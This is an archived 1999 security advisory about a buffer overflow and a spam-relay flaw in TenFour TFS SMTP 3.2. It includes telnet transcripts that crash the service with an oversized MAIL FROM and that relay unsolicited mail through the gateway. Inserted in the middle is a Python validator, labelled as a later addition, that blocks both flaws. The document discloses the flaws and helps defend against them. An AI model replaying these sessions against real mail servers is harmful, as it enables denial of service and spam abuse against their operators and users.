smtp_bof.txt

1999-09-19T00:00:00
ID PACKETSTORM:15651
Type packetstorm
Reporter Packet Storm
Modified 1999-09-19T00:00:00

Description

`Subject: [SECURITY] TenFour TFS SMTP 3.2 Buffer Overflow  
To: BUGTRAQ@SECURITYFOCUS.COM   
  
  
INTRINsec Security Advisory  
  
  
  
Release Date : August 30, 1999  
Software : TenFour TFS SMTP 3.2  
Operating System: Windows NT 3.x / 4.x  
Impact : Attackers can use a misconfigured TFS SMTP for  
spamming and can remotely crash the TFS SMTP Gateway.  
Author : Christophe.Lesur@INTRINsec.com  
Status : TenFour has been advised of this.  
URLs : http://www.intrinsec.com/  
  
  
  
__ Digest __  
  
  
  
The TenFour TFS SMTP Release 3.2 has two vulnerabilities: a buffer overflow  
and, under some circumstances and due to the inherent TFS architecture, it can  
be used for spamming.  
  
  
The direct results are that an attacker can remotely crash your TFS SMTP Gateway  
or send unsolicited mail to someone (and to the TFS ADMINISTRATOR).  
  
  
TenFour has been advised of this. Thanks to Roberto Correnti for his support.  
(http://www.tenfour.com)  
  
  
  
__ Technical Details and Exploits __  
  
  
  
TenFour TFS SMTP Version 3.2 has two vulnerabilities: a buffer overflow and,  
under some circumstances, it can be used for spamming.  
  
  
First : Buffer Overflow.  
  
  
There is a major buffer overflow in TFS SMTP 3.2. When you connect to the  
SMTP service on port 25, you get the TFS prompt. After sending the 'helo'  
command, if you send a 'MAIL FROM' argument larger than 128 bytes, you will crash  
the SMTP service with a protection fault. It is a plain buffer overflow,  
and it has been fixed in release 4.0.  
  
  
This is the exploit :  
  
  
  
[clesur@raptor clesur]$ telnet mailhost.victim.com 25   
Trying 1.1.1.1...   
Connected to mailhost.victim.com.   
Escape character is '^]'.   
220 mailhost.victim.com is ready. TFS SMTP Server ver 3.2   
helo   
250 mailhost.victim.com, Hello   
  
  
mail from:<ddddddddddddd ... lots of char ... dddddddddddddddd>  
  
  
Connection closed by foreign host.   
  
  
  
  
Second : Spamming  
  
  
The TFS SMTP engine accepts any mail by default and processes it in its kernel.  
In the case of a deficient message (wrong recipient, wrong domain...), TFS SMTP is   
usually configured to warn the sender and the TFS ADMINISTRATOR by sending a 4-line warning   
AND the full message. Because there is no domain check before the message is handed to   
the TFS core, it is possible to spam someone and the TFS administrator.  
  
  
  
This is the exploit :  
  
  
  
[clesur@raptor clesur]$ telnet mailhost.tfsvictim.com 25   
Trying 1.1.1.1...   
Connected to mailhost.tfsvictim.com.   
Escape character is '^]'.   
220 mailhost.tfsvictim.com is ready. TFS SMTP Server ver 3.2   
helo   
250 mailhost.tfsvictim.com, Hello   
mail from:<target@victim.com>   
250 Sender <target@victim.com> OK   
rcpt to:<target@victim.com>   
250 Recipient <target@victim.com> OK   
data   
354 Begin data transfer. End with period.   
from: target@victim.com   
to: target@victim.com   
  
  
<YOUR MESSAGE BODY HERE>   
.  
  
  
250 Message accepted   
quit   
221 Connection closed   
Connection closed by foreign host.   
  
  
  
The spammed user will receive this message in their mailbox.  
  
  
Message 22:   
From target@victim.com Thu Jul 29 09:49:40 1999   
Delivered-To: target@victim.com   
From: target@victim.com   
Date: Thu, 29 Jul 1999 11:44:03 +0200   
Subject: <No subject>   
MIME-version: 1.0   
Content-transfer-encoding: quoted-printable   
  
  
####################################################   
This message was not delivered to   
target@victim.com  
TFS Admin was informed with a copy of this message   
Sender was informed with a copy of this message   
####################################################   
  
  
<YOUR MESSAGE BODY HERE>  
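Both problems above come down to checks the gateway should apply to the SMTP envelope before anything reaches its core: bounding the length of the MAIL FROM argument instead of copying it into a fixed buffer, and refusing RCPT TO for domains the host does not serve, so that no "not delivered" notice is ever generated for an unverified sender. The validator below is an added example written for this advisory; it is not TFS code and was not published by INTRINsec or TenFour. The 512-byte line and 256-byte path limits are taken from RFC 821, the local-domain set is a hypothetical configuration, and the three sample sessions are constructed to mirror the two transcripts above.

```python
import re

# Limits taken from RFC 821 (the SMTP specification current in 1999):
# a command line is at most 512 characters including CRLF, and a
# reverse-path or forward-path is at most 256 characters.
MAX_LINE = 512
MAX_PATH = 256

# Hypothetical gateway configuration: the only domain this host accepts
# mail for. "tfsvictim.com" is the name used in the advisory transcript.
LOCAL_DOMAINS = {"tfsvictim.com"}

# "<user@domain>" or the null reverse-path "<>"; no whitespace or
# angle brackets inside the address.
_PATH_RE = re.compile(r"^<(?:([^<>@\s]+)@([^<>@\s]+))?>$")


class SmtpEnvelope:
    """Validates HELO/MAIL/RCPT before anything is passed to the mail core."""

    def __init__(self, local_domains=LOCAL_DOMAINS):
        self.local_domains = {d.lower() for d in local_domains}
        self.sender = None
        self.recipients = []

    def handle(self, raw_line: bytes) -> str:
        # Check 1: bound the line length *before* decoding or copying it.
        # An oversized command gets a 5xx reply instead of a crash.
        if len(raw_line) > MAX_LINE:
            return "500 Line too long"
        try:
            line = raw_line.decode("ascii").rstrip("\r\n")
        except UnicodeDecodeError:
            return "500 Syntax error: non-ASCII command"
        verb, _, arg = line.partition(" ")
        verb = verb.upper()
        if verb == "HELO":
            return "250 Hello"
        if verb == "MAIL":
            return self._mail(arg)
        if verb == "RCPT":
            return self._rcpt(arg)
        return "502 Command not implemented"

    @staticmethod
    def _parse_path(arg: str, keyword: str):
        """Return ((localpart, domain), None) or (None, error reply).
        The length test runs before the regex, so no unbounded input is
        ever pattern-matched or stored."""
        if not arg.upper().startswith(keyword + ":"):
            return None, "501 Syntax error in parameters"
        path = arg[len(keyword) + 1:].strip()
        if len(path) > MAX_PATH:
            return None, "501 Path too long"
        m = _PATH_RE.match(path)
        if not m:
            return None, "501 Bad address syntax"
        return (m.group(1) or "", (m.group(2) or "").lower()), None

    def _mail(self, arg: str) -> str:
        if self.sender is not None:
            return "503 Sender already specified"
        addr, err = self._parse_path(arg, "FROM")
        if err:
            return err
        self.sender = addr
        return "250 Sender OK"

    def _rcpt(self, arg: str) -> str:
        if self.sender is None:
            return "503 Need MAIL command first"
        addr, err = self._parse_path(arg, "TO")
        if err:
            return err
        # Check 2: the domain test the advisory says TFS lacks. A recipient
        # outside our own domains is refused here, so the core never sees
        # the message and never mails a warning plus full copy to the
        # (unverified) envelope sender or to the administrator.
        if addr[1] not in self.local_domains:
            return "550 Relaying denied"
        self.recipients.append(addr)
        return "250 Recipient OK"


def replay(envelope: SmtpEnvelope, lines) -> list:
    """Feed each client line through the validator and collect the replies."""
    return [envelope.handle(line) for line in lines]


# Constructed sample sessions mirroring the advisory's two transcripts.
OVERFLOW_SESSION = [b"helo\r\n", b"mail from:<" + b"d" * 300 + b">\r\n"]
RELAY_SESSION = [b"helo\r\n", b"mail from:<target@victim.com>\r\n",
                 b"rcpt to:<target@victim.com>\r\n"]
LEGIT_SESSION = [b"helo\r\n", b"mail from:<alice@example.net>\r\n",
                 b"rcpt to:<bob@tfsvictim.com>\r\n"]

if __name__ == "__main__":
    for name, session in (("overflow", OVERFLOW_SESSION),
                          ("relay", RELAY_SESSION),
                          ("legit", LEGIT_SESSION)):
        print(name, replay(SmtpEnvelope(), session))
```

The 300-byte MAIL FROM from the first transcript is answered with "501 Path too long" and the session continues, and the second transcript's RCPT TO for victim.com is refused with "550 Relaying denied" before any message data is accepted; a recipient in the gateway's own domain still goes through.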
  
  
  
__ Solutions __  
  
  
For these vulnerabilities, TenFour suggests upgrading to a version greater  
than 4.0.  
  
  
__ Contacts __  
  
  
  
-- Tenfour --  
  
  
TenFour South Europe   
ITFamily Sarl   
Le Technoparc   
15, rue Edouard Jeanneret   
78306 Poissy Cedex   
France   
Tel: +33 1 39 22 65 15   
Fax: +33 1 39 11 49 77   
WWW: http://www.tenfour.fr   
  
  
-- INTRINsec --  
  
  
INTRINsec is a computer security company.  
http://www.INTRINsec.com  
This advisory is also available in French on our site.  
  
  
  
__ DISCLAIMERS __  
  
  
  
INTRINsec DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR IMPLIED, AND PROVIDES  
THIS INFORMATION "AS IS" WITHOUT WARRANTY OF ANY KIND. INTRINsec IS NOT  
LIABLE FOR ANY DAMAGES WHATSOEVER EVEN IF INTRINsec HAS BEEN ADVISED OF THE  
POSSIBILITY OF SUCH DAMAGES.  
  
  
--  
Christophe Lesur, Security Consultant  
INTRINsec   
mailto:christophe.lesur@INTRINsec.com  
`